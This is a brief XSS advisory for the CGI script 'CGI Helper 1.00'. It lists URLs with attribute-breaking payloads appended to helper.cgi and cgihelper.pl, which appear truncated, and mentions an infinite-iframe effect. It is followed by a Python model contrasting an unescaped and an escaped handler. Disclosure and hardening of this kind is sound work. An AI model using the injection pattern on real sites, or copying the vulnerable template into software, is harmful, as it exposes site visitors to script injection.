## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>’>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>’>
The script makes infinite iframes that can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>’>
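
An added example, not code from CGI Helper or from this advisory: a Python model of a CGI handler that writes its own URL (SCRIPT_NAME plus PATH_INFO, the text that follows the script name in the URLs above) into a quoted HTML attribute, next to a version that HTML-escapes the value. The form template, the function names and the sample PATH_INFO are assumptions, since the advisory does not show the script's source.

```python
import html
from html.parser import HTMLParser

# Assumption: the page template puts the script's own URL in a single-quoted
# attribute. The advisory does not show the real CGI source.
TEMPLATE = "<form method='post' action='%s'>...</form>"

# Constructed sample: what the web server hands the script when extra path
# text follows the script name. A harmless <i> tag stands in for any markup.
SAMPLE_ENV = {
    "SCRIPT_NAME": "/cgi-bin/helper.cgi",
    "PATH_INFO": "/>'><i>constructed-marker</i>",
}

# Extra layer for the iframe case: the browser refuses to load any frames.
HARDENED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Content-Security-Policy", "default-src 'self'; frame-src 'none'"),
]

def self_url(environ):
    return environ.get("SCRIPT_NAME", "") + environ.get("PATH_INFO", "")

def render_vulnerable(environ):
    # Request-controlled text goes into the markup unchanged.
    return TEMPLATE % self_url(environ)

def render_hardened(environ):
    # quote=True also encodes ' and ", so the value cannot end the attribute.
    return TEMPLATE % html.escape(self_url(environ), quote=True)

class _StartTags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))

def start_tags(page):
    """Return [(tag, attrs)] for every element a parser finds in page."""
    parser = _StartTags()
    parser.feed(page)
    parser.close()
    return parser.seen

if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        print(render.__name__, [t for t, _ in start_tags(render(SAMPLE_ENV))])
```

Escaping only `<` and `>` would not be enough in this attribute context, because a bare quote already ends the attribute value; that is why the hardened form encodes quotes as well.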